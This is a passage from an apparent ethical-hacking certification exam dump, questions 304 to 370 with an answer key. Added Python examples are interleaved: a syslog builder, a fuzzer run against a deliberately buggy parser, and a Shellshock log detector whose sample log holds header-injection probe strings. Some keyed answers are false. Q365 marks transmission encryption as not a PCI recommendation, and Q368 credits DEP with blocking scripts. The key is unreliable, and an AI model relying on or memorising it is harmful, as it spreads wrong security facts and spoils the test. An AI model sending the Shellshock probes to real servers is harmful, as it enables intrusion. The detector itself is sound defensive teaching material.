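
def decode_pri(pri):
    """Return (facility, severity) for a PRI value; inverse of encode_pri."""
    return divmod(pri, 8)


def build_message(facility, severity, hostname, tag, text, pid=None, when=None):
    """Format one RFC 3164 line; the day of month is space-padded as the RFC requires."""
    t = time.localtime(time.time() if when is None else when)
    stamp = f"{time.strftime('%b', t)} {t.tm_mday:2d} {time.strftime('%H:%M:%S', t)}"
    tag_part = f"{tag}[{pid}]" if pid is not None else tag
    return f"<{encode_pri(facility, severity)}>{stamp} {hostname} {tag_part}: {text}"


def parse_message(line):
    """Parse a line back into its fields; raise ValueError on anything malformed."""
    m = _MSG_RE.match(line)
    if not m:
        raise ValueError("not an RFC 3164 message")
    pri = int(m["pri"])
    if pri > 191:                        # 23 * 8 + 7 is the largest legal PRI
        raise ValueError("PRI out of range")
    facility, severity = decode_pri(pri)
    return {"facility": facility, "severity": severity, "timestamp": m["ts"],
            "host": m["host"], "tag": m["tag"],
            "pid": int(m["pid"]) if m["pid"] else None, "msg": m["msg"]}


def send_udp(line, collector, port=514):
    """Ship a message to the collector over UDP/514 (not exercised offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(line.encode(), (collector, port))


if __name__ == "__main__":
    # constructed alert text in Snort's style; the rule ID is made up
    line = build_message(FACILITIES["auth"], SEVERITIES["alert"], "snort-sensor",
                         "snort", "[1:1000001:1] TEST port scan detected", pid=4242)
    print(line)                       # starts with <33>: auth (4) * 8 + alert (1)
    print(parse_message(line))
```

Kiwi and most collectors also accept the newer RFC 5424 framing, which adds a version number and an ISO timestamp after the PRI; the PRI arithmetic is the same.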

QUESTION 304
Which of the following security operations is used for determining the attack surface of an organization?

A. Running a network scan to detect network services in the corporate DMZ


B. Training employees on the security policy regarding social engineering
C. Reviewing the need for a security clearance for each employee
D. Using configuration management to determine when and where to apply security patches

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 305
The security concept of "separation of duties" is most similar to the operation of which type of security device?

A. Firewall
B. Bastion host
C. Intrusion Detection System
D. Honeypot

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 306
The "black box testing" methodology enforces which kind of restriction?

A. Only the external operation of a system is accessible to the tester.


B. Only the internal operation of a system is known to the tester.
C. The internal operation of a system is only partly accessible to the tester.
D. The internal operation of a system is completely known to the tester.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 307
The "gray box testing" methodology enforces what kind of restriction?

A. The internal operation of a system is only partly accessible to the tester.


B. The internal operation of a system is completely known to the tester.
C. Only the external operation of a system is accessible to the tester.
D. Only the internal operation of a system is known to the tester.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 308
The "white box testing" methodology enforces what kind of restriction?

A. The internal operation of a system is completely known to the tester.


B. Only the external operation of a system is accessible to the tester.
C. Only the internal operation of a system is known to the tester.
D. The internal operation of a system is only partly accessible to the tester.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 309
To determine if a software program properly handles a wide range of invalid input, a form of automated testing
can be used to randomly generate invalid input in an attempt to crash the program.

What term is commonly used when referring to this type of testing?

A. Fuzzing
B. Randomizing
C. Mutating
D. Bounding

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
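A fuzzer of the kind the question describes, as an added example that is not part of the original page: the record format, the target parser and its off-by-one bug are constructed for the demo. The harness treats a clean ValueError as the parser handling bad input correctly and anything else as a crash, which is the same distinction real fuzzers such as AFL or libFuzzer make with signals and sanitizers; the corrected parser is included so the fuzzer can confirm the fix.

```python
"""A minimal mutation fuzzer that finds an off-by-one crash in a constructed parser.

Added example, not from the exam page. The record format, the parser and its
bug are made up for the demo.
"""
import random

# [length][payload ...][checksum]; a valid 3-byte record, constructed as the seed
SEED_RECORD = bytes([3, 97, 98, 99, (97 + 98 + 99) % 256])


def parse_record(data):
    """Deliberately buggy: the checksum index is not bounds-checked, so a
    length of len(data) - 1 reads one byte past the end."""
    if len(data) < 2:
        raise ValueError("record too short")
    n = data[0]
    if n > len(data) - 1:
        raise ValueError("length field exceeds buffer")
    payload = data[1:1 + n]
    checksum = data[1 + n]                    # IndexError when n == len(data) - 1
    if sum(payload) % 256 != checksum:
        raise ValueError("bad checksum")
    return bytes(payload)


def parse_record_fixed(data):
    """Same format with the bound corrected: payload and checksum must both fit."""
    if len(data) < 2:
        raise ValueError("record too short")
    n = data[0]
    if n > len(data) - 2:
        raise ValueError("length field exceeds buffer")
    payload = data[1:1 + n]
    if sum(payload) % 256 != data[1 + n]:
        raise ValueError("bad checksum")
    return bytes(payload)


def mutate(seed, rng):
    """Apply one random mutation. 'interesting' plants boundary values, which is
    what turns a blind random search into one that hits length-field bugs fast."""
    data = bytearray(seed)
    op = rng.choice(("flip", "set", "interesting", "truncate", "append"))
    if op == "flip" and data:
        data[rng.randrange(len(data))] ^= 1 << rng.randrange(8)
    elif op == "set" and data:
        data[rng.randrange(len(data))] = rng.randrange(256)
    elif op == "interesting" and data:
        value = rng.choice((0, 1, len(data) - 1, len(data), 0x7F, 0xFF))
        data[rng.randrange(len(data))] = value & 0xFF
    elif op == "truncate":
        del data[rng.randrange(len(data) + 1):]
    else:
        data.append(rng.randrange(256))
    return bytes(data)


def fuzz(target, seed, iterations, rng_seed=1):
    """Run the target on mutated inputs; return {(exception type, message): input}
    for every distinct crash, keeping the first input that produced it."""
    rng = random.Random(rng_seed)             # fixed seed so runs are reproducible
    crashes = {}
    for _ in range(iterations):
        sample = mutate(seed, rng)
        try:
            target(sample)
        except ValueError:
            continue                          # graceful rejection, not a bug
        except Exception as exc:              # anything else is a crash
            crashes.setdefault((type(exc).__name__, str(exc)), sample)
    return crashes


if __name__ == "__main__":
    for (kind, msg), sample in fuzz(parse_record, SEED_RECORD, 2000).items():
        print(f"{kind}: {msg} <- {sample.hex()}")
    print("fixed parser crashes:", fuzz(parse_record_fixed, SEED_RECORD, 2000))  # {}
```

Keeping the first input per distinct exception is the simplest form of crash deduplication; a real harness minimises that input further so the triage starts from the smallest reproducer.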

QUESTION 310
To maintain compliance with regulatory requirements, a security audit of the systems on a network must be
performed to determine their compliance with security policies. Which one of the following tools would most
likely be used in such an audit?

A. Vulnerability scanner
B. Protocol analyzer
C. Port scanner
D. Intrusion Detection System

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 311
Which of these options is the most secure procedure for storing backup tapes?

A. In a climate-controlled facility offsite
B. On a different floor in the same building
C. Inside the data center for faster retrieval in a fireproof safe
D. In a cool dry environment

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 312
What term describes the amount of risk that remains after the vulnerabilities are classified and the
countermeasures have been deployed?

A. Residual risk
B. Inherent risk
C. Deferred risk
D. Impact risk

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 313
Risks = Threats x Vulnerabilities is referred to as the:

A. Risk equation
B. Threat assessment
C. BIA equation
D. Disaster recovery formula

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 314
Which of the following is designed to identify malicious attempts to penetrate systems?

A. Intrusion Detection System


B. Firewall
C. Proxy
D. Router

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 315
Which of the following is a low-tech way of gaining unauthorized access to systems?

A. Social Engineering
B. Sniffing
C. Eavesdropping
D. Scanning

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 316
PGP, SSL, and IKE are all examples of which type of cryptography?

A. Public Key
B. Secret Key
C. Hash Algorithm
D. Digest

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 317
Which method of password cracking takes the most time and effort?

A. Brute force
B. Rainbow tables
C. Dictionary attack
D. Shoulder surfing

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
QUESTION 318
What is the most common method to exploit the "Bash Bug" or "ShellShock" vulnerability?

A. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable
to a vulnerable Web server
B. Manipulate format strings in textfields
C. SSH
D. SYN Flood

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
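The detection side of the answer, as an added example that is not part of the original page: CGI passes request headers to scripts as environment variables (HTTP_USER_AGENT, HTTP_REFERER and so on), and a vulnerable bash executes whatever follows a function definition imported from such a variable, so the probe is visible in the logged header. The log lines and addresses below are constructed for the demo, and the detector keys on the function-definition prefix rather than on any particular command after it, so it catches scanners and exploitation attempts alike.

```python
"""Flag Shellshock probes in web server access logs.

Added example, not from the exam page; the log lines and addresses are
constructed.
"""
import re

FUNCTION_IMPORT_RE = re.compile(r"\(\s*\)\s*\{")   # bash function-import marker

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# constructed sample; the first and third lines carry the probe
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
198.51.100.3 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [25/Sep/2014:10:13:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { ignored; }; /bin/true" "curl/7.37.0"
192.0.2.9 - - [25/Sep/2014:10:15:00 +0000] "POST /login HTTP/1.1" 302 0 "https://example.test/" "Mozilla/5.0 (Windows NT 6.1)"
"""


def parse_combined(line):
    """Return the log fields as a dict, or None for a line that does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def probe_fields(entry):
    """Names of the header-derived fields that carry a function-import marker."""
    return [f for f in ("agent", "referer", "request")
            if FUNCTION_IMPORT_RE.search(entry[f])]


def find_shellshock_probes(log_text):
    """Return (ip, path, fields, targets_cgi) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_combined(line)
        if not entry:
            continue            # unparsable line; a real pipeline would count these
        fields = probe_fields(entry)
        if fields:
            parts = entry["request"].split(" ")
            path = parts[1] if len(parts) > 1 else ""
            hits.append((entry["ip"], path, fields, "/cgi-bin/" in path))
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
    # ('203.0.113.7', '/cgi-bin/status', ['agent'], True)
    # ('203.0.113.7', '/cgi-bin/test.cgi', ['referer'], True)
```

Access logs only show the headers the server chose to log; a payload in Cookie or a custom header reaches the CGI environment just the same, so raw request capture at a proxy or IDS sees more than this script can.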

QUESTION 319
Which of the following tools performs comprehensive tests against web servers, including dangerous files and
CGIs?

A. Nikto
B. Snort
C. John the Ripper
D. Dsniff

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 320
Which of the following tools is used to analyze the files produced by several packet-capture programs such as
tcpdump, WinDump, Wireshark, and EtherPeek?

A. tcptrace
B. tcptraceroute
C. Nessus
D. OpenVAS

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 321
Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a
Linux platform?

A. Kismet
B. Nessus
C. Netstumbler
D. Abel

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 322
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small-sized packets
to the target computer, making it very difficult for an I DS to detect the attack signatures.

Which tool can be used to perform session splicing attacks?

A. Whisker
B. tcpsplice
C. Burp
D. Hydra

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 323
Which of the following tools can be used for passive OS fingerprinting?

A. tcpdump
B. nmap
C. ping
D. tracert

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 324
You are the Systems Administrator for a large corporate organization. You need to monitor all network traffic on
your local network for suspicious activities and receive notifications when an attack is occurring. Which tool
would allow you to accomplish this goal?

A. Network-based IDS
B. Firewall
C. Proxy
D. Host-based IDS

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 325
What does a firewall check to prevent particular ports and applications from getting packets into an
organization?

A. Transport layer port numbers and application layer headers
B. Presentation layer headers and the session layer port numbers
C. Network layer headers and the session layer port numbers
D. Application layer port numbers and the transport layer headers

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 326
You work as a Security Analyst for a retail organization. In securing the company's network, you set up a
firewall and an IDS. However, hackers are able to attack the network. After investigating, you discover that your
IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the
IDS giving?

A. False Negative
B. False Positive
C. True Negative
D. True Positive

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 327
Which of the following types of firewalls ensures that the packets are part of the established session?

A. Stateful inspection firewall
B. Circuit-level firewall
C. Application-level firewall
D. Switch-level firewall

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 328
Which of the following incident handling process phases is responsible for defining rules, collaborating with the
human workforce, creating a back-up plan, and testing the plans for an organization?

A. Preparation phase
B. Containment phase
C. Identification phase
D. Recovery phase

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 329
Ricardo wants to send secret messages to a competitor company. To secure these messages, he uses a
technique of hiding a secret message within an ordinary message. The technique provides 'security through
obscurity'.

What technique is Ricardo using?

A. Steganography
B. Public-key cryptography
C. RSA algorithm
D. Encryption

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 330
During a security audit of IT processes, an IS auditor found that there were no documented security
procedures. What should the IS auditor do?

A. Identify and evaluate existing practices


B. Create a procedures document
C. Conduct compliance testing
D. Terminate the audit

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 331
Which of the following statements regarding ethical hacking is incorrect?

A. Ethical hackers should never use tools or methods that have the potential of exploiting vulnerabilities in an
organization's systems.
B. Testing should be remotely performed offsite.
C. An organization should use ethical hackers who do not sell vendor hardware/software or other consulting
services.
D. Ethical hacking should not involve writing to or modifying the target systems.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 332
Craig received a report of all the computers on the network that showed all the missing patches and weak
passwords. What type of software generated this report?

A. a port scanner
B. a vulnerability scanner
C. a virus scanner
D. a malware scanner

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 333
What two conditions must a digital signature meet?

A. Has to be unforgeable, and has to be authentic.
B. Has to be legible and neat.
C. Must be unique and have special characters.
D. Has to be the same number of characters as a physical signature and must be unique.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 334
An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server
and NTP server because of the importance of their job. The attacker gains access to the DNS server and
redirects the name www.google.com to his own IP address. Now when the employees of the office want to go
to Google they are being redirected to the attacker's machine. What is the name of this kind of attack?

A. ARP Poisoning
B. Smurf Attack
C. DNS spoofing
D. MAC Flooding

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 335
If executives are found liable for not properly protecting their company's assets and information systems, what
type of law would apply in this situation?

A. Civil
B. International
C. Criminal
D. Common

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 336
Which tier in the N-tier application architecture is responsible for moving and processing data between the
tiers?

A. Application Layer
B. Data tier
C. Presentation tier
D. Logic tier

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 337
An attacker tries to do banner grabbing on a remote web server and executes the following command.

$ nmap -sV host.domain.com -p 80

He gets the following output.

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-08 19:10 EST
Nmap scan report for host.domain.com (108.61.158.211)
Host is up (0.032s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds

What did the hacker accomplish?

A. nmap can't retrieve the version number of any running remote service.
B. The hacker successfully completed the banner grabbing.
C. The hacker should've used nmap -O host.domain.com.
D. The hacker failed to do banner grabbing as he didn't get the version of the Apache web server.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 338
________ is a set of extensions to DNS that provides DNS clients (resolvers) with origin authentication of DNS
data to reduce the threat of DNS poisoning, spoofing, and similar attack types.

A. DNSSEC
B. Zone transfer
C. Resource transfer
D. Resource records

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 339
Sid is a judge for a programming contest. Before the code reaches him it goes through a restricted OS and is
tested there. If it passes, then it moves on to Sid. What is this middle step called?

A. Fuzzy-testing the code
B. Third party running the code
C. Sandboxing the code
D. String validating the code

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 340
An IT employee got a call from one of our best customers. The caller wanted to know about the company's
network infrastructure, systems, and team. New opportunities of integration are in sight for both company and
customer. What should this employee do?

A. Since the company's policy is all about Customer Service, he/she will provide information.
B. Disregarding the call, the employee should hang up.
C. The employee should not provide any information without previous management authorization.
D. The employees can not provide any information; but, anyway, he/she will provide the name of the person in
charge.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
QUESTION 341
A well-intentioned researcher discovers a vulnerability on the web site of a major corporation. What should he
do?

A. Ignore it.
B. Try to sell the information to a well-paying party on the dark web.
C. Notify the web site owner so that corrective action be taken as soon as possible to patch the vulnerability.
D. Exploit the vulnerability without harming the web site owner so that attention be drawn to the problem.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 342
Rebecca commonly sees an error on her Windows system that states that a Data Execution Prevention (DEP)
error has taken place. Which of the following is most likely taking place?

A. A race condition is being exploited, and the operating system is containing the malicious process.
B. A page fault is occurring, which forces the operating system to write data from the hard drive.
C. Malware is executing in either ROM or a cache memory area.
D. Malicious code is attempting to execute instruction in a non-executable memory region.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 343
Attempting an injection attack on a web server based on responses to True/False questions is called which of
the following?

A. Blind SQLi
B. DMS-specific SQLi
C. Classic SQLi
D. Compound SQLi

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 344
In order to surf the Internet anonymously, which of the following is the best choice?

A. Use SSL sites when entering personal information
B. Use Tor network with multi-node
C. Use shared WiFi
D. Use public VPN

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 345
A penetration test was done at a company. After the test, a report was written and given to the company's IT
authorities. A section from the report is shown below:

Access List should be written between VLANs. Port security should be enabled for the intranet.

A security solution which filters data packets should be set between the intranet (LAN) and the DMZ. A WAF
should be used in front of the web applications.

According to the section from the report, which of the following choices is true?

A. MAC Spoof attacks cannot be performed.
B. Possibility of SQL Injection attack is eliminated.
C. A stateful firewall can be used between intranet (LAN) and DMZ.
D. There is access control policy between VLANs.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 346
Websites and web portals that provide web services commonly use the Simple Object Access Protocol SOAP.
Which of the following is an incorrect definition or characteristic of the protocol?

A. Based on XML
B. Provides a structured model for messaging
C. Exchanges data between web services
D. Only compatible with the application protocol HTTP

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 347
An attacker with access to the inside network of a small company launches a successful STP manipulation
attack. What will he do next?

A. He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.
B. He will activate OSPF on the spoofed root bridge.
C. He will repeat the same attack against all L2 switches of the network.
D. He will repeat this action so that it escalates to a DoS attack.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 348
A large mobile telephony and data network operator has a data center that houses network elements. These are
essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS
systems. What is the best security policy concerning this setup?

A. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits
should be performed.
B. As long as the physical access to the network elements is restricted, there is no need for additional
measures.
C. There is no need for specific security measures on the network elements as long as firewalls and IPS
systems exist.
D. The operator knows that attacks and down time are inevitable and should have a backup site.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 349
When purchasing a biometric system, one of the considerations that should be reviewed is the processing
speed. Which of the following best describes what is meant by processing?

A. The amount of time it takes to convert biometric data into a template on a smart card.
B. The amount of time and resources that are necessary to maintain a biometric system.
C. The amount of time it takes to be either accepted or rejected from when an individual provides identification
and authentication information.
D. How long it takes to setup individual user accounts.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 350
Due to a slowdown of normal network operations, the IT department decided to monitor Internet traffic for all of
the employees. From a legal standpoint, what would be troublesome about taking this kind of measure?

A. All of the employees would stop normal work activities
B. IT department would be telling employees who the boss is
C. Not informing the employees that they are going to be monitored could be an invasion of privacy.
D. The network could still experience traffic slow down.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 351
In many states sending spam is illegal. Thus, the spammers have techniques to try and ensure that no one
knows they sent the spam out to thousands of users at a time. Which of the following best describes what
spammers use to hide the origin of these types of e-mails?

A. A blacklist of companies that have their mail server relays configured to allow traffic only to their specific
domain name.
B. Mail relaying, which is a technique of bouncing e-mail from internal to external mail servers continuously.
C. A blacklist of companies that have their mail server relays configured to be wide open.
D. Tools that will reconfigure a mail server's relay component to send the e-mail back to the spammers
occasionally.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 352
You are an Ethical Hacker who is auditing the ABC company. When you verify the NOC one of the machines
has 2 connections, one wired and the other wireless. When you verify the configuration of this Windows system
you find two static routes.

route add 10.0.0.0 mask 255.0.0.0 10.0.0.1
route add 0.0.0.0 mask 255.0.0.0 199.168.0.1

What is the main purpose of those static routes?

A. Both static routes indicate that the traffic is external with different gateway.
B. The first static route indicates that the internal traffic will use an external gateway and the second static
route indicates that the traffic will be rerouted.
C. Both static routes indicate that the traffic is internal with different gateway.
D. The first static route indicates that the internal addresses are using the internal gateway and the second
static route indicates that all the traffic that is not internal must go to an external gateway.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 353
What is the correct process for the TCP three-way handshake connection establishment and connection
termination?

A. Connection Establishment: FIN, ACK-FIN, ACK; Connection Termination: SYN, SYN-ACK, ACK
B. Connection Establishment: SYN, SYN-ACK, ACK; Connection Termination: ACK, ACK-SYN, SYN
C. Connection Establishment: ACK, ACK-SYN, SYN; Connection Termination: FIN, ACK-FIN, ACK
D. Connection Establishment: SYN, SYN-ACK, ACK; Connection Termination: FIN, ACK-FIN, ACK

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 354
Emil uses nmap to scan two hosts using this command:

nmap -sS -T4 -O 192.168.99.1 192.168.99.7

He receives this output:

Nmap scan report for 192.168.99.1
Host is up (0.00082s latency).
Not shown: 994 filtered ports
PORT    STATE  SERVICE
21/tcp  open   ftp
23/tcp  open   telnet
53/tcp  open   domain
80/tcp  open   http
161/tcp closed snmp
MAC Address: B0:75:D5:33:57:74 (ZTE)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

Nmap scan report for 192.168.99.7
Host is up (0.000047s latency).
All 1000 scanned ports on 192.168.99.7 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

What is his conclusion?

A. Host 192.168.99.7 is an iPad.
B. He performed a SYN scan and OS scan on hosts 192.168.99.1 and 192.168.99.7.
C. Host 192.168.99.1 is the host that he launched the scan from.
D. Host 192.168.99.7 is down.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 355
You're doing an internal security audit and you want to find out what ports are open on all the servers. What is
the best way to find out?

A. Scan servers with Nmap
B. Physically go to each server
C. Scan servers with MBSA
D. Telnet to every port on each server

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 356
The establishment of a TCP connection involves a negotiation called the 3-way handshake. What type of
message does the client send to the server in order to begin this negotiation?

A. RST
B. ACK
C. SYN-ACK
D. SYN

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 357
Internet Protocol Security (IPSec) is actually a suite of protocols. Each protocol within the suite provides different
functionality. Collectively, IPSec does everything except:

A. Protect the payload and the headers
B. Authenticate
C. Encrypt
D. Work at the Data Link Layer

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 358
Todd has been asked by the security officer to purchase a counter-based authentication system. Which of the
following best describes this type of system?

A. A biometric system that bases authentication decisions on behavioral attributes.
B. A biometric system that bases authentication decisions on physical attributes.
C. An authentication system that creates one-time passwords that are encrypted with secret keys.
D. An authentication system that uses passphrases that are converted into virtual passwords.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 359
An attacker attaches a rogue router in a network. He wants to redirect traffic to a LAN attached to his router as
part of a man-in-the-middle attack. What measure on behalf of the legitimate admin can mitigate this attack?

A. Only using OSPFv3 will mitigate this risk.
B. Make sure that legitimate network routers are configured to run routing protocols with authentication.
C. Redirection of the traffic cannot happen unless the admin allows it explicitly.
D. Disable all routing protocols and only use static routes.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 360
Look at the following output. What did the hacker accomplish?

; <<>> DiG 9.7.-P1 <<>> axfr domain.com @192.168.1.105
;; global options: +cmd
domain.com. 3600 IN SOA srv1.domain.com. hostsrv1.domain.com. 131 900 600 86400 3600
domain.com. 600 IN A 192.168.1.102
domain.com. 600 IN A 192.168.1.105
domain.com. 3600 IN NS srv1.domain.com.
domain.com. 3600 IN NS srv2.domain.com.
vpn.domain.com. 3600 IN A 192.168.1.1
server.domain.com. 3600 IN A 192.168.1.3
office.domain.com. 3600 IN A 192.168.1.4
remote.domain.com. 3600 IN A 192.168.1.48
support.domain.com. 3600 IN A 192.168.1.47
ns1.domain.com. 3600 IN A 192.168.1.41
ns2.domain.com. 3600 IN A 192.168.1.42
ns3.domain.com. 3600 IN A 192.168.1.34
ns4.domain.com. 3600 IN A 192.168.1.45
srv1.domain.com. 3600 IN A 192.168.1.102
srv2.domain.com. 1200 IN A 192.168.1.105
domain.com. 3600 IN SOA srv1.domain.com. hostsrv1.domain.com. 131 900 600 86400 3600
;; Query time: 269 msec
;; SERVER: 192.168.1.105#53(192.168.1.105)
;; WHEN: Sun Aug 11 20:07:59 2013
;; XFR size: 65 records (messages 65, bytes 4501)

A. The hacker used whois to gather publicly available records for the domain.
B. The hacker used the "fierce" tool to brute force the list of available domains.
C. The hacker listed DNS records on his own domain.
D. The hacker successfully transferred the zone and enumerated the hosts.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 361
What network security concept requires multiple layers of security controls to be placed throughout an IT
infrastructure, which improves the security posture of an organization to defend against malicious attacks or
potential vulnerabilities?

A. Security through obscurity
B. Host-Based Intrusion Detection System
C. Defense in depth
D. Network-Based Intrusion Detection System

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 362
Scenario:
1. Victim opens the attacker's website.
2. Attacker sets up a web site which contains interesting and attractive content like 'Do you want to make $1000
in a day?'.
3. Victim clicks to the interesting and attractive content url.
4. Attacker creates a transparent 'iframe' in front of the url which victim attempts to click, so victim thinks that
he/she clicks to the 'Do you want to make $1000 in a day?' url but actually he/she clicks to the content or url
that exists in the transparent 'iframe' which is set up by the attacker.
What is the name of the attack which is mentioned in the scenario?

A. HTTP Parameter Pollution
B. HTML Injection
C. Session Fixation
D. ClickJacking Attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 363
If there is an Intrusion Detection System (IDS) in the intranet, which port scanning technique cannot be used?

A. Spoof Scan
B. TCP Connect scan
C. TCP SYN
D. Idle Scan

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 364
What is correct about digital signatures?

A. A digital signature cannot be moved from one signed document to another because it is the hash of the
original document encrypted with the private key of the signing party.
B. Digital signatures may be used in different documents of the same type.
C. A digital signature cannot be moved from one signed document to another because it is a plain hash of the
document content.
D. Digital signatures are issued once for each user and can be used everywhere until they expire.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 365
What is not a PCI compliance recommendation?

A. Limit access to card holder data to as few individuals as possible.
B. Use encryption to protect all transmission of card holder data over any public network.
C. Rotate employees handling credit card transactions on a yearly basis to different departments.
D. Use a firewall between the public network and the payment card data.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 366
Which Intrusion Detection System is best applicable for large environments where critical assets on the network
need extra security and is ideal for observing sensitive network segments?

A. Network-based intrusion detection system (NIDS)
B. Host-based intrusion detection system (HIDS)
C. Firewalls
D. Honeypots

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 367
An attacker is using nmap to do a ping sweep and a port scan in a subnet of 254 addresses. In which order
should he perform these steps?

A. The sequence does not matter. Both steps have to be performed against all hosts.
B. First the port scan to identify interesting services and then the ping sweep to find hosts responding to icmp
echo requests.
C. First the ping sweep to identify live hosts and then the port scan on the live hosts. This way he saves time.
D. The port scan alone is adequate. This way he saves time.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 368
What mechanism in Windows prevents a user from accidentally executing a potentially malicious batch (.bat) or
PowerShell (.ps1) script?

A. User Access Control (UAC)
B. Data Execution Prevention (DEP)
C. Address Space Layout Randomization (ASLR)
D. Windows firewall

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 369
Which of the following areas is considered a strength of symmetric key cryptography when compared with
asymmetric algorithms?

A. Scalability
B. Speed
C. Key distribution
D. Security

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 370
By using a smart card and pin, you are using a two-factor authentication that satisfies

A. Something you know and something you are
B. Something you have and something you know
C. Something you have and something you are
D. Something you are and something you remember

